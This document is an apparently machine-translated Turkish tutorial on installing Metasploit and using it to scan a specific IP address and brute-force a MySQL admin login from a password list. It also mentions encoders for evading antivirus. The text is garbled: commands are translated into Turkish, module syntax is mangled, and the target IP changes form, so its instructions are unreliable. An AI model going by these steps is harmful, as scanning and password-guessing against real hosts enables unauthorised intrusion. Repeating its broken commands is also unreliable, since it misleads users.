İçindekiler
Metasploit Çerçevesi, bir bir bilgisayar veya sunucuya karşı açıklardan yararlanma geliştirme ve çalıştırma aracı. Metasploit Framework Ruby dilinde yazılmıştır, çok platformludur ve çalışması için güçlü bir bilgisayar gerektirir, topluluk için ücretli bir sürümü ve ücretsiz bir sürümü vardır.www.metasploit.com/framework/download adresinden indirilebilir.
içine kurulum yapacağız Linux Ubutnu'su, ancak bazı komutları değiştirerek diğer dağıtımlar için çalışır.
Perl ile çalışmadan önce terminal penceresine erişir ve Ruby'yi kurarız, ancak tamamen yeni programlanmıştır.
Daha sonra çerçeveyi çalıştırabilmemiz için Ruby bağımlılıklarını kuruyoruz.
sudo apt-get kurulumu ruby libruby rdoc sudo apt-get kurulumu libyaml-ruby sudo apt-get kurulumu libzlib-ruby sudo apt-get kurulumu libopenssl-ruby sudo apt-get kurulumu libdl-ruby sudo apt-get kurulumu libreadline-ruby sudo apt -get kurulumu libiconv-ruby sudo apt-get kurulumu rubygems * sudo apt-get kurulumu libgtk2-ruby libglade2-ruby
Daha sonra termink'ten indirdiğimiz sürüme göre 32 veya 64 bit izin vereceğiz:
chmod + x metasploit-latest-linux-x64-installer.run
Yükleyiciyi çalıştırıyoruz ve yükleme penceresi açılacak:
sudo metasploit-latest-linux-x64-installer.run
Kurulumun sonunda terminal penceresinden ve root erişimi ile çerçeveyi güncelliyoruz
komutla:
msfupdate
Metasploit, tamamen terminalde çalışan grafik ortamı olmayan bir programdır. Yazılıma terminalden şu komutla erişiyoruz:
msfconsole
MSF'yi dahili olarak tanımak
MSF (Metasploit Çerçevesi) Aşağıdakiler gibi bir dizi modülde yapılandırılmıştır:
İstismarlar MSF'de bulunan ve kullanabileceğimiz komut dosyaları ve programlar nelerdir, bunlar işletim sistemi ve kategorilere göre düzenlenir, örneğin, Windows'ta çalışan tarayıcılar için kullanılabilen açıklar / pencereler / tarayıcı / açıklar.
Yükler: Test ettiğimiz zafiyetin bulunup istismar edilmesi durumunda yapılacak olan eylemdir.
Ek: yardımcı / tarayıcı / bağlantı noktası taraması / tcp gibi farklı işlevlere sahip yardımcı komut dosyaları ve bu tcp bağlantı noktası tarayıcısını kullanarak bağlantı noktası durumunu elde ederiz. Bu komut dosyası Nmap'e bir alternatiftir.
Enconders: Bazı antivirüs ve antispammer'lardan kaçmak için komut dosyası kodluyorlar.
Yürüttüğümüz terminalden bir test örneği başlatıyoruz:./msfconsole
nmap ile bir ip tarayarak başlayacağız
msf> nmap -sV 190.155.80.110
mysql üzerinde çalışmayı sağlayacak script araçlarına erişmek için yardımcı modülü aktif hale getiriyoruz. Modülün sürümünü de görebiliriz.
msf> yardımcı (mysql_version)> RHOSTS 190.155.80.110 // uzak ipi ayarlayın msf> RHOSTS 192.155.80.110 ayarla msf> yardımcı (mysql_version)> çalıştırın // mysql sürümünü kontrol edin
Doğru yürütülürse, mysql sürümünü döndürebilir:
[*] 190.155.80.110 Mysql5.0 çalıştırıyor
Tarama modülüyle ilgili başka bir durum ve mysql'nin kök kullanıcısını değiştirmeye çalışmak:
msf> tarayıcı kullan / mysql / mysql_login msf> KULLANICI ADI admin ayarla msf> PASS_FILE /tmp/keys.lst // metin dosyasını olası anahtarların altında olacak şekilde ayarla msf> istismar
İşe yararsa, mysql'e giriş yapabiliriz:
mysql -h 1920,155,80,110 -u yönetici -pkey